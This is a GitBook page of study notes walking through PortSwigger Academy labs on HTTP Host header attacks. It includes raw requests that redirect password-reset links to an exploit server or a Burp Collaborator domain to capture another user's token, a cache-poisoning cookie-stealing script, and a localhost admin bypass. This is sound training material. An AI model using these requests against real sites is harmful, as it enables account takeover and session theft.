🕸️
Web Security Notes
  • README
  • Portswigger
    • Access Control
      • notes
      • labs
    • Authentication
      • notes
      • labs
    • Business Logic Vulnerabilities
      • notes
      • labs
    • Clickjacking
      • notes
      • labs
    • Command Injection
      • notes
      • labs
    • CORS
      • notes
      • labs
    • CSRF
      • notes
      • labs
    • Directory Traversal
      • notes
      • labs
    • DOM-based Vulnerabilities
      • notes
      • labs
    • File upload Vulnerabilities
      • notes
      • labs
    • HTTP Host Header Attacks
      • notes
      • labs
    • HTTP Request Smuggling
      • notes
      • labs
    • Information Disclosure
      • notes
      • labs
    • Insecure Deserialization
      • notes
      • labs
    • JWT Attacks
      • notes
      • labs
    • OAuth Authentication
      • notes
      • labs
    • Server Side Template Injection
      • notes
      • labs
    • SQL injection
      • notes
      • labs
      • cheat sheet
    • SSRF
      • notes
      • labs
    • Web Cache Poisoning
      • notes
      • labs
    • WebSockets
      • notes
      • labs
    • XSS
      • notes
      • labs
    • XXE Injection
      • notes
      • labs
Powered by GitBook
On this page
  • Lab - 1: Basic password reset poisoning (A)
  • Lab - 2: Password reset poisoning via middleware (P)
  • Lab - 3: Password reset poisoning via dangling markup (E)
  • Lab - 4: Web cache poisoning via ambiguous requests
  • Lab 5 : Host header authentication bypass (A)
  • Lab - 6: Routing-based SSRF (P)
  1. Portswigger
  2. HTTP Host Header Attacks

labs

Lab - 1: Basic password reset poisoning (A)

  • This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

how forgot password works in this lab ?

  • first test with own account wiener

  • enter name at forgot password page will make a post request

POST /forgot-password HTTP/1.1
Host: 0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net
...
csrf=TmWD6yKuj2ZaYbUZkL6sH3f6jom3mvU3&username=wiener

  • Then Please check your email for a reset password link.

  • In email box, the following link with token is received.

https://0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net/forgot-password?temp-forgot-password-token=WLiNjn9NG1CUePEojyt8OtuiaCr3clzi

If follow the link, reset password page is received. Then POST request to change the password.

POST /forgot-password?temp-forgot-password-token=Hg1GwkdzYSEpDG5FDG5M3gNMULH0vGPS HTTP/1.1
Host: 0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net
...

csrf=9FlVx2UgbGDnst1PfLnKjyNdNp2h9wPi&temp-forgot-password-token=Hg1GwkdzYSEpDG5FDG5M3gNMULH0vGPS&new-password-1=peter&new-password-2=peter

How to exploit other user

  • test the Host header for POST request with other Hosts

POST /forgot-password HTTP/1.1
Host: www.test.com
...
csrf=TmWD6yKuj2ZaYbUZkL6sH3f6jom3mvU3&username=wiener

  • Email still received with the following link

https://www.test.com/forgot-password?temp-forgot-password-token=hZ2261K8u025FraGlCRDl2Gs7RRFMjd0

  • change the Host header to exploit server and change the user name to other user

POST /forgot-password HTTP/1.1
Host: exploit-0a47002904c32fb3c00831f6017b006e.web-security-academy.net/
...
csrf=SOcfxkHQ6D47ls6UbKS5xRvORlFvvlfm&username=carlos

  • Then look at the exploit server log and found a GET request with token.

  • use that token to get the change password page for other user

https://0a2e00ee047f2fdbc0bd31ff00010045.web-security-academy.net/forgot-password?temp-forgot-password-token=<token-from-log>

Lab - 2: Password reset poisoning via middleware (P)

  • This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: wiener:peter. Any emails sent to this account can be read via the email client on the exploit server.

POST /forgot-password HTTP/1.1
X-Forwarded-Host: l5r2vxr3alvuvijrao2ocl83puvkj9.burpcollaborator.net
Host: 0a64005403af9d9ac08f879e001900f4.web-security-academy.net
...
username=carlos

Lab - 3: Password reset poisoning via dangling markup (E)

plan after XSS

Lab - 4: Web cache poisoning via ambiguous requests

  • This lab is vulnerable to web cache poisoning due to discrepancies in how the cache and the back-end application handle ambiguous requests. An unsuspecting user regularly visits the site's home page. To solve the lab, poison the cache so the home page executes alert(document.cookie) in the victim's browser.

  • add second Host header with exploit server and see where it is reflected

  • in exploit server File path: /resources/js/tracking.js

  • in exploit server Body : alert(document.cookie)

Lab 5 : Host header authentication bypass (A)

  • This lab makes an assumption about the privilege level of the user based on the HTTP Host header. To solve the lab, access the admin panel and delete Carlos's account.

  • admin route can be found at /admin

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost

Lab - 6: Routing-based SSRF (P)

  • This lab is vulnerable to routing-based SSRF via the Host header. You can exploit this to access an insecure intranet admin panel located on an internal IP address. To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos.

PreviousnotesNextHTTP Request Smuggling

Last updated 2 years ago